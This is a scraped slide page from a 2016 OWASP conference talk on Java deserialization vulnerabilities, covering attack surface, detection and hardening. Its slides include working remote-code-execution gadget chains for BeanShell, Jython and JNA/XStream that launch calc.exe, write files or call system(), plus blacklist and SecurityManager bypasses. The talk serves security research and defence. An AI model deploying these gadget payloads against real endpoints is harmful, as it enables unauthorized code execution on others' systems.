Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
In this session we begin with modelling the attack surface of Java deserialization, which often leads to remote code execution (RCE), by showcasing vulnerabilities we found in modern and widely used applications and frameworks. We extend existing research about risks of deserialization broadening the attack surface. After a live demo of getting a Meterpreter shell in a modern Java endpoint setup we delve into the exploitation styles for this vulnerability to lay the foundation of the first of three key takeaways for the attendees: The first key takeaway is identification of test types that should be executed during a dynamic assessment of an application in order to find this kind of vulnerability. This includes analyzing the deserialization interface and using blackbox tests to create payloads with gadgets matching the application’s classpath to verify the RCE. Discussion extends to cover indirect deserialization interfaces that use non-binary data formats, such as XML-based interfaces, which can also act as a driver for deserialization within the application. The next key takeaway covers the realm of static code analysis (SAST). We present code patterns security reviewers should look for when doing whitebox assessments of applications or frameworks. This is especially interesting for code offering dynamic functionality including AOP, generic mappings, reflection, interceptors, etc. - all of which have a high probability of including code that can facilitate as deserialization gadgets and thus help the attackers in exploiting deserialization vulnerabilities. In this section we present the techniques used to find the vulnerabilities within the popular frameworks showcased during the live demo at the session’s start. Finally we conclude with tips on implementing different techniques of hardening measures for applications offering deserialisation interfaces (either direct binary deserialization interfaces or indirect XML-based ones) to give the attendees the third key takeaway: protecting applications properly. This includes ways to verify data integrity prior to deserialization and ways to properly inspect the data before it’s handled by the Java deserialization process. -- This talk was presented by Christian Schneider & Alvaro Muñoz at the OWASP BeNeLux Day 2016.
![New RCE Gadget in BeanShell
(CVE-2016-2510)
13
1 String payload = "compare(Object foo, Object bar) {" +
2 " new java.lang.ProcessBuilder(new String[]{"calc.exe"}).start();return 1;" +
3 "}";
4
5 // Create Interpreter
6 Interpreter i = new Interpreter();
7 i.eval(payload);
8
9 // Create Proxy/InvocationHandler
10 XThis xt = new XThis(i.getNameSpace(), i);
11 InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt);
12 Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class<?>[]{Comparator.class}, handler);
13
14 // Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
15 final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
16 Object[] queue = new Object[] {1,1};
17 setFieldValue(priorityQueue, "queue", queue);
18 setFieldValue(priorityQueue, "size", 2);](https://image.slidesharecdn.com/201603owaspbeneluxjavadeserialization-160318172604/85/Serial-Killer-Silently-Pwning-your-Java-Endpoints-OWASP-BeNeLux-Day-2016-13-320.jpg)
![New RCE Gadget in Jython (CVE pending)
15
1 // Python bytecode to write a file on disk
2 String code =
3 "740000" + // 0 LOAD_GLOBAL 0 (open)
4 "640100" + // 3 LOAD_CONST 1 (<PATH>)
5 "640200" + // 6 LOAD_CONST 2 ('w')
6 "830200" + // 9 CALL_FUNCTION 2
7 "690100" + // 12 LOAD_ATTR 1 (write)
8 "640300" + // 15 LOAD_CONST 3 (<CONTENT>)
9 "830100" + // 18 CALL_FUNCTION 1
10 "01" + // 21 POP_TOP
11 "640000" + // 22 LOAD_CONST
12 "53"; // 25 RETURN_VALUE
13
14 // Helping cons and names
15 PyObject[] consts = new PyObject[]{new PyString(""), new PyString(path), new PyString("w"), new PyString(content)};
16 String[] names = new String[]{"open", “write"};
17
18 PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{}, "noname", "<module>", 0, "");
19 setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray());
20 PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);](https://image.slidesharecdn.com/201603owaspbeneluxjavadeserialization-160318172604/85/Serial-Killer-Silently-Pwning-your-Java-Endpoints-OWASP-BeNeLux-Day-2016-15-320.jpg)
![Exis;ng Mi;ga;on Advice
20
Simply remove gadget classes from ClassPath
Not feasible given more and more gadgets becoming available
Blacklist & Whitelist based check at ObjectInputStream.resolveClass
Different implementa@ons of this "Lookahead"-Deserializa@on exist:
Use of ObjectInputStream subclass in applica@on’s deserializa@on code
Agent-based (AOP-like) hooking of calls to ObjectInputStream.resolveClass()
Blacklists: Bypasses might exist (in your dependencies or your own code)
Whitelists: Difficult to get right & DoS though JDK standard classes possible
Ad hoc SecurityManager sandboxes during deserializa@on
Execu@on can be deferred a]er deserializa@on: we’ll show later how…](https://image.slidesharecdn.com/201603owaspbeneluxjavadeserialization-160318172604/85/Serial-Killer-Silently-Pwning-your-Java-Endpoints-OWASP-BeNeLux-Day-2016-20-320.jpg)
![Bypassing LookAhead Blacklists
New gadget type to bypass ad-hoc look-ahead ObjectInputStream blacklist protec@ons:
Can we find a class like:
During deserializa@on of the object graph, a new immaculate unprotected
ObjectInputStream will be instan@ated
AEacker can provide any arbitrary bytes for unsafe deserializa@on
Bypass does not work for cases where ObjectInputStream is instrumented
22
1 public class NestedProblems implements Serializable {
2 byte[] bytes … ;
3 …
4 private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
5 ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
6 ois.readObject();
7 }
8 }](https://image.slidesharecdn.com/201603owaspbeneluxjavadeserialization-160318172604/85/Serial-Killer-Silently-Pwning-your-Java-Endpoints-OWASP-BeNeLux-Day-2016-22-320.jpg)
![Example (has been fixed)
org.apache.commons.scxml2.env.groovy.GroovyContext
24
1 @SuppressWarnings("unchecked")
2 private void readObject(ObjectInputStream in) throws IOException,ClassNotFoundException {
3 this.scriptBaseClass = (String)in.readObject();
4 this.evaluator = (GroovyEvaluator)in.readObject();
5 this.binding = (GroovyContextBinding)in.readObject();
6 byte[] bytes = (byte[])in.readObject();
7 if (evaluator != null) {
8 this.vars = (Map<String, Object>)
9 new ObjectInputStream(new ByteArrayInputStream(bytes)) {
10 protected Class resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException {
11 return Class.forName(osc.getName(), true, evaluator.getGroovyClassLoader());
12 }
13 }.readObject();
14 }
15 else {
16 this.vars = (Map<String, Object>)new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject();
17 }
18 }](https://image.slidesharecdn.com/201603owaspbeneluxjavadeserialization-160318172604/85/Serial-Killer-Silently-Pwning-your-Java-Endpoints-OWASP-BeNeLux-Day-2016-24-320.jpg)
More Related Content
What's hot (20)
Similar to Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016 (20)
![[Wroclaw #7] Why So Serial?](https://cdn.slidesharecdn.com/ss_thumbnails/whysoserialv1-171206133328-thumbnail.jpg?width=560&fit=bounds)
Recently uploaded (20)
![Get & Download Wondershare Filmora Crack Latest [2025]](https://cdn.slidesharecdn.com/ss_thumbnails/revolutionizingresidentialwi-fi-250422112639-60fb726f-250429170801-59e1b240-thumbnail.jpg?width=560&fit=bounds)
![Download Wondershare Filmora Crack [2025] With Latest](https://cdn.slidesharecdn.com/ss_thumbnails/neo4j-howkgsareshapingthefutureofgenerativeaiatawssummitlondonapril2024-240426125209-2d9db05d-250419-250428115407-a04afffa-thumbnail.jpg?width=560&fit=bounds)
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
- 6. Serializable Class Java Deserializa;on in a Nutshell 6 6. Restore object member fields • readObject(ObjectInputStream) • readObjectNoData() 7. Eventually replace restored object • readResolve() 8. Optionally validate object • validateObject() 9. Cast deserialized object to expected type 10.Use deserialized object ObjectInputStream Application Code Garbage Collector 11.Call finalize() on GC 1. Get bytes 2. Initialize ObjectInputStream 3. Read object from stream • ois.readObject()4. Resolve classes of stream resolveClass() 5. Deserialize objects
- 7. Triggering Execu;on via "Magic Methods" 7 Serializable Class 6. Restore object member fields • readObject(ObjectInputStream) • readObjectNoData() 7. Eventually replace restored object • readResolve() 8. Optionally validate object • validateObject() 9. Cast deserialized object to expected type 10.Use deserialized object ObjectInputStream Application Code Garbage Collector 11.Call finalize() on GC 1. Get bytes 2. Initialize ObjectInputStream 3. Read object from stream • ois.readObject()4. Resolve classes of stream resolveClass() 5. Deserialize objects
- 13. New RCE Gadget in BeanShell (CVE-2016-2510) 13 1 String payload = "compare(Object foo, Object bar) {" + 2 " new java.lang.ProcessBuilder(new String[]{"calc.exe"}).start();return 1;" + 3 "}"; 4 5 // Create Interpreter 6 Interpreter i = new Interpreter(); 7 i.eval(payload); 8 9 // Create Proxy/InvocationHandler 10 XThis xt = new XThis(i.getNameSpace(), i); 11 InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt); 12 Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class<?>[]{Comparator.class}, handler); 13 14 // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) 15 final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator); 16 Object[] queue = new Object[] {1,1}; 17 setFieldValue(priorityQueue, "queue", queue); 18 setFieldValue(priorityQueue, "size", 2);
- 15. New RCE Gadget in Jython (CVE pending) 15 1 // Python bytecode to write a file on disk 2 String code = 3 "740000" + // 0 LOAD_GLOBAL 0 (open) 4 "640100" + // 3 LOAD_CONST 1 (<PATH>) 5 "640200" + // 6 LOAD_CONST 2 ('w') 6 "830200" + // 9 CALL_FUNCTION 2 7 "690100" + // 12 LOAD_ATTR 1 (write) 8 "640300" + // 15 LOAD_CONST 3 (<CONTENT>) 9 "830100" + // 18 CALL_FUNCTION 1 10 "01" + // 21 POP_TOP 11 "640000" + // 22 LOAD_CONST 12 "53"; // 25 RETURN_VALUE 13 14 // Helping cons and names 15 PyObject[] consts = new PyObject[]{new PyString(""), new PyString(path), new PyString("w"), new PyString(content)}; 16 String[] names = new String[]{"open", “write"}; 17 18 PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{}, "noname", "<module>", 0, ""); 19 setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray()); 20 PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);
- 16. New RCE Gadgets More of our reported RCE gadgets s;ll being fixed Stay tuned! TwiEer: @pwntester & @cschneider4711 Blog: hEps://hp.com/go/hpsrblog 16 ZDI ID Affected Vendor(s) Severity (CVSS) ZDI-CAN-3511 Oracle 7.5 ZDI-CAN-3510 Oracle 7.5 ZDI-CAN-3497 Oracle 7.5 ZDI-CAN-3588 Oracle 7.5 ZDI-CAN-3592 Oracle 7.5
- 21. How did vendors handle this recently? Vendor / Product Type of Protection Atlassian Bamboo Removed Usage of Serialization Apache ActiveMQ LAOIS Whitelist Apache Batchee LAOIS Blacklist + optional Whitelist Apache JCS LAOIS Blacklist + optional Whitelist Apache openjpa LAOIS Blacklist + optional Whitelist Apache Owb LAOIS Blacklist + optional Whitelist Apache TomEE LAOIS Blacklist + optional Whitelist ********** (still to be fixed) LAOIS Blacklist 21
- 22. Bypassing LookAhead Blacklists New gadget type to bypass ad-hoc look-ahead ObjectInputStream blacklist protec@ons: Can we find a class like: During deserializa@on of the object graph, a new immaculate unprotected ObjectInputStream will be instan@ated AEacker can provide any arbitrary bytes for unsafe deserializa@on Bypass does not work for cases where ObjectInputStream is instrumented 22 1 public class NestedProblems implements Serializable { 2 byte[] bytes … ; 3 … 4 private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { 5 ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes)); 6 ois.readObject(); 7 } 8 }
- 24. Example (has been fixed) org.apache.commons.scxml2.env.groovy.GroovyContext 24 1 @SuppressWarnings("unchecked") 2 private void readObject(ObjectInputStream in) throws IOException,ClassNotFoundException { 3 this.scriptBaseClass = (String)in.readObject(); 4 this.evaluator = (GroovyEvaluator)in.readObject(); 5 this.binding = (GroovyContextBinding)in.readObject(); 6 byte[] bytes = (byte[])in.readObject(); 7 if (evaluator != null) { 8 this.vars = (Map<String, Object>) 9 new ObjectInputStream(new ByteArrayInputStream(bytes)) { 10 protected Class resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException { 11 return Class.forName(osc.getName(), true, evaluator.getGroovyClassLoader()); 12 } 13 }.readObject(); 14 } 15 else { 16 this.vars = (Map<String, Object>)new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject(); 17 } 18 }
- 25. Now with home delivery javax.media.jai.remote.SerializableRenderedImage finalize() > dispose() > closeClient() Bypasses ad-hoc Security Managers 25 1 private void closeClient() { 2 3 // Connect to the data server. 4 Socket socket = connectToServer(); 5 6 // Get the socket output stream and wrap an object 7 // output stream around it. 8 OutputStream out = null; 9 ObjectOutputStream objectOut = null; 10 ObjectInputStream objectIn = null; 11 try { 12 out = socket.getOutputStream(); 13 objectOut = new ObjectOutputStream(out); 14 objectIn = new ObjectInputStream(socket.getInputStream()); 15 } catch (IOException e) { ... } 16 ... 18 try { 19 objectIn.readObject(); 20 } catch (IOException e) { 21 sendExceptionToListener(JaiI18N.getString( 22 "SerializableRenderedImage8"), 23 new ImagingException(JaiI18N.getString( 24 "SerializableRenderedImage8"), e)); 25 } catch (ClassNotFoundException cnfe) { 26 sendExceptionToListener(JaiI18N.getString( 27 "SerializableRenderedImage9"), 28 new ImagingException(JaiI18N.getString( 29 "SerializableRenderedImage9"), cnfe)); 30 } 31 ... 32 }
- 26. Demo of bypass 26 Let’s take a look at the live demo…
- 28. Exploi;ng JNA 28 1 <sorted-set> 2 <string>calc.exe</string> 3 <dynamic-proxy> 4 <interface>java.lang.Comparable</interface> 5 <handler class="com.sun.jna.CallbackReference$NativeFunctionHandler"> 6 <options /> 7 <function class="com.sun.jna.Function"> 8 <peer>140735672090131</peer> <!-- depends on target --> 9 <library> 10 <libraryName>c</libraryName> 11 <libraryPath>libc.dylib</libraryPath> 12 </library> 13 <functionName>system</functionName> 14 </function> 15 </handler> 16 </dynamic-proxy> 17 </sorted-set>
- 32. Finding Direct Deserializa;on Endpoints Find calls (within your code and your dependencies’ code) to: ObjectInputStream.readObject() ObjectInputStream.readUnshared() Where InputStream is aEacker controlled. For example: … and ObjectInputStream is or extends java.io.ObjectInputStream … but is not a safe one (eg: Commons-io Valida@ngObjectInputStream) 32 1 InputStream is = request.getInputStream(); 2 ObjectInputStream ois = new ObjectInputStream(is); 3 ois.readObject();
- 36. Passive Deserializa;on Endpoint Detec;on 36 Requests (or any network traffic) carrying serialized Java objects: Easy to spot due to magic bytes at the beginning: 0xAC 0xED … Some web-apps might use Base64 to store serialized data in Cookies, etc.: rO0 … Be aware that compression could’ve been applied before Base64 Several Burp-Plugins have been created recently to passively scan for Java serializa@on data as part of web traffic analysis Also test for non-web related (binary) traffic with network protocol analyzers
- 38. Hardening Advice